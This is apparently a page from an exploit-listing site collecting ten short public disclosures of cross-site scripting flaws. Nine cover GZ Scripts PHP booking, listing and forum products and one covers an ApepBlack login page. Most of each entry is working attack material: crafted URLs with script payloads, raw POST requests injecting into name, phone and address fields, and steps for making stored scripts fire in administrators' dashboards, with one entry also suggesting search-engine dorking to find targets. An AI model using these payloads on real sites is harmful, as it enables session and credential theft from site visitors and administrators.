Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/gz-forum-script.html │ │ Vendor : GZ Scripts │ │ Software : GZ Forum Script 1.8 │ │ Vuln Type: Reflected XSS - Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Reflected XSS │ │ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ │ │ │ Stored XSS │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php GET 'catid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a Path: /preview.php GET 'topicid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2 ## Stored XSS ----------------------------------------------- POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1 -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="free_name" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic_message" <script>alert(1)</script> -----------------------------39829578812616571248381709325-- ----------------------------------------------- POST parameter 'free_name' is vulnerable to XSS POST parameter 'topic' is vulnerable to XSS POST parameter 'topic_message' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic) 2. Inject your [XSS Payload] in "Name" 3. Inject your [XSS Payload] in "Topic Title " 4. Inject your [XSS Payload] in "Topic Message" 5. Submit 4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on 5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard) 6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index) [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/php-gz-hotel-booking-script.html │ │ Vendor : GZ Scripts │ │ Software : GZ Hotel Booking Script 1.8 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /PHPGZHotelBooking/load.php?controller=GzFront&action=booking_details HTTP/1.1 first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&terms=1&date_range=29.06.2023+-+30.06.2023&date_to=30.06.2023&date_from=29.06.2023&adults=1&children=1&order=&sort=&fromNumber=&toNumber=&room_id%5B4%5D=1&room_id%5B3%5D=0&room_id%5B2%5D=0&room_id%5B1%5D=0&adults_arr%5B4%5D%5B1%5D=1&children_arr%5B4%5D%5B1%5D=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any [Room] for Booking 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/ticket-booking-script.html │ │ Vendor : GZ Scripts │ │ Software : Ticket Booking Script 1.8 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /TicketBookingScript/load.php?controller=GzFront&action=booking_details&cid=all&layout=calendar&show_header=T&local=3 HTTP/1.1 title=mr&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=wjrgvb&terms=1&ticket_id%5B%5D=532&event_id=3 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any [Event] for Booking - Select seats 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/php-gz-appointment-scheduling-script.html │ │ Vendor : GZ Scripts │ │ Software : GZ Appointment Scheduling 1.8 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /PHPGZAppointment/load.php?controller=GzFront&action=step5 HTTP/1.1 service_id=1&employee_id=1&timeslot=1688119200&lang=3&date=2023-06-30&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=murimy&terms=1&lang=3 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any [Employee] & Select the Day and the Time 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php#!/GzAdmin/home/) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php#!/GzBooking/index/) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php#!/GzInvoice/index/) XSS Will Fire and Executed on his Browser [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/property-listing-script.html │ │ Vendor : GZ Scripts │ │ Software : Property Listing Script 1.0 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php GET 'page' parameter is vulnerable to RXSS https://website/preview.php?&page=j5wno%22%3e%3cscript%3ealert(1)%3c%2fscript%3epjd8c&sort_by=ascprice Path: /preview.php GET 'layout' parameter is vulnerable to RXSS https://website/preview.php?layout=gridpv063%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg46bc Path: /preview.php GET 'sort_by' parameter is vulnerable to RXSS https://website/preview.php?&page=1&sort_by=orbb0%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhv9a [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/car-listing-script-php.html │ │ Vendor : GZ Scripts │ │ Software : Car Listing Script 1.8 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php URL parameter is vulnerable to RXSS http://website/preview.php/n42rk"><script>alert(1)</script>i2rgn?controller=GzFront&action=detail&car_id=10 Path: /preview.php GET 'page' parameter is vulnerable to RXSS http://website/preview.php?&page=tdnzc%22%3e%3cscript%3ealert(1)%3c%2fscript%3eq4n0s&sort_by=old_listing Path: /preview.php GET 'sort_by' parameter is vulnerable to RXSS http://website/preview.php?&page=1&sort_by=bpei5%22%3e%3cscript%3ealert(1)%3c%2fscript%3erfgo3 [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/php-vacation-rental-script.html │ │ Vendor : GZ Scripts │ │ Software : Vacation Rental Script 1.8 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php GET 'page' parameter is vulnerable to RXSS https://website/preview.php?&page=m47wf%22%3e%3cscript%3ealert(1)%3c%2fscript%3el35t9&sort_by=date Path: /preview.php GET 'layout' parameter is vulnerable to RXSS https://website/preview.php?layout=gridbhclb%22%3e%3cscript%3ealert(1)%3c%2fscript%3er8p4d Path: /preview.php GET 'sort_by' parameter is vulnerable to RXSS https://website/preview.php?&page=1&sort_by=bg8c8%22%3e%3cscript%3ealert(1)%3c%2fscript%3elbm07 Path: /preview.php GET 'property_id' parameter is vulnerable to RXSS https://website/preview.php?controller=GzFront&action=detail&property_id=1nob9z%22%3e%3cscript%3ealert(1)%3c%2fscript%3evts7c [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : ApepBlack Premium Checker cms 3.0.5 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://new.apepblack.net/login | | # Dork : A tool made with by ApepBlack | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /login?password=pass&redirect=1'"()%26%25<acx><script>alert(/indoushka/);</script>&username=fkxypeoi [+] https://127.0.0.1/new.apepblack.net/login?password=pass&redirect=1%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E&username=fkxypeoi ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/event-booking-calendar.html │ │ Vendor : GZ Scripts │ │ Software : Event Booking Calendar 1.8 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1 payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on it & Press [Booking] 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/time-slot-booking-calendar-php.html │ │ Vendor : GZ Scripts │ │ Software : Time Slot Booking Calendar 1.8 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1 promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking] 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done </code></pre>